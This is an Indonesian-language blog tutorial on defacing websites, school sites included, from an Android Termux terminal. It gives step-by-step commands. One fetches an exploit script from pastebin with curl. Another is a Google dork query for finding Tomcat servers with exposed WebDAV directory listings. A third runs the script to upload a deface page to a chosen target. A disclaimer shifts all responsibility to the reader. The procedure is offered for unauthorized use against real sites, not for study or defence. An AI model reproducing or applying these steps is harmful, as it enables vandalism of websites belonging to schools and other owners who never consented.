🔔Download the application [siapTv.apk ] for ease and comfort in watching matches Install APK

Cara Hack Website Sekolah Menggunakan Termux Untuk Pemula

Cara Hack Website Sekolah Menggunakan Termux Untuk Pemula

Melakukan sebuah peretasan pada suatu sistem keamanan memang terbilang cukup keren. Apalagi kemanan yang kita retas adalah kemanan tingkat tinggi.

Tapi kita jangan bermimpi dulu bisa melakukan sebuah peretasan pada sistem kemanan seperti contohnya Bank ataupun instansi lainnya jika kita masih bermodalkan copy-paste script.

Ditambah lagi hanya bermodalkan termux yang notabane nya hanyalah sebuah aplikasi Terminal Emulator. Tentu itu sangat terbatas.

Lalu apa saja yang dapat kita lakukan dengan aplikasi termux ini?

Aplikasi termux dapat melakukan peretasan hanya sebatas pada teknik deface dan dDos attack saja. Bukan alih-alih kita masuk pada sistem yang diretas dan kita bisa mencuri data-data penting yang terdapat di dalamnya.

Deface sendiri merupakan sebuah teknik serangan pada situs web yang mengubah tampilan visual situs web tersebut atau halaman web tertentu.

Sedangkan oknum yang melakukan deface disebut defacer.

Sedangkan untuk melakukan peretasasn yang dapat membuat kita melakukan pencurian data atau masuk pada sistem itu merupakan teknik yang berbeda dan berada pada level tinggi. Seperti teknik phising yang memanfaatkan social engine guna mendapatkan akses masuk berupa username dan password dari korban.

Jadi bisa dibedakan antara hack pencurian data pribadi dan hack deface.

Dan yang akan kita bahas kali ini adalah melakukan peretasan pada website menggunakan teknik deface.

Ikuti langkah demi langkah degan cermat dan teliti supaya tidak terjadi eror dan tidak menimbulkan pertanyaan yang sebenarnya jawabannya berada pada artikel yang disebabkan karena kalian malas membaca.

Cara hack Website Dengan Teknik Deface Menggunakan Termux

1. Langkah 1. Pastikan kalian sudah Mempunyai Script Deface terkebih dahulu. Jika belum kalian bisa mendownload script deface pada tombol di bawah

2. Langkah 2. Masuk pada aplikasi termux dan masukan kode di bawah ini satu persatu. Setelah memasukan kode jangan lupa untuk menekan Enter.

  1. apt install python2
  2. pip2 install urllib3 chardet certifi idna requests
  3. apt install openssl curl
  4. pkg install libcurl

3. Langkah 3. Berikan izin aplikasi pada akses ke penyimpanan dengan memasukan kode di bawah dan tekan enter.

termux-setup-storage

Pindahkan file Script deface pada luar folder penyimpanan kamu sehingga tidak menyulitkan pada saat penulisan pada termux nanti

3. Langkah 3. Silahkan kamu unduh Tools WebDev Exploiter pada termux dengan cara memasukan kode perintah.

curl -S http://pastebin.com/raw/HnVyQPtR --output wrbdav.py

4. Langkah 4. Setelah itu cari taraget website di google dork dengan memasukan kueri di bawah ini pada kolom pencarian google.

intitle:”Directory Listing For /” + inurl:webdav tomcat  intitle:”Directory Listing For /” +

5. Langkah 5. Jika sudah silahkan salin url situs target dan lanjut pada langkah berikutnya.

6. Langkah 6. Kembali lagi di termux, kemudian masukkan perintah

python2 webdav.py situstargetkalian.com /sdcard/namascriptdefacekamu.html

Pada bagian yang ditandai silahkan ganti dengan url situs target dan nama file script deface kalian.

7. Langkah 7. Jika sudah maka akan muncul file uploader pada termux yang menandakan bahwa file kalian telah berhasil di upload pada website/situs tersebut.

Kalian dapat mengecek hasilnya dengan cara mengunjungi situs target kalian pada browser. Jika tampilannya berubah menjadi tampilan dari script deface kalian, maka kalian telah berhasil melakukan hack pada website/situs tersebut.

Cara ini berlaku untuk semua situs web yang sudah vuln alias rentan, jadi jika cara ini gagal maka sudah dipastikan bahwa situs web tersebut tidak vuln.

Penutup

Cara di atas memang banyak dipakai oleh para hacker termux karena caranya yang terbilang cukup mudah dan simple.

Lakukan cara di atas dengan bijak, admin tidak bertanggung jawab atas apa yang terjadi setelah kalian melakukan peretasan di atas.

Segala bentuk tanggung jawab berada pada diri kalian masing-masig.

Jadi sekian tutorial hack website menggunakan termux kali ini, dan silahkan coba cara hack lainnya yang bisa kalian baca dan pelajari pada situs blog ini. Terimakasih.

You May Like These Article
What else do you want to write an article about? Write in the comments column.

Post a Comment

Leave Comments on Topic. Always Use Polite Language
Cookie Consent
Kami menyajikan cookie di situs ini untuk menganalisis lalu lintas, mengingat preferensi Anda, dan mengoptimalkan pengalaman Anda.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.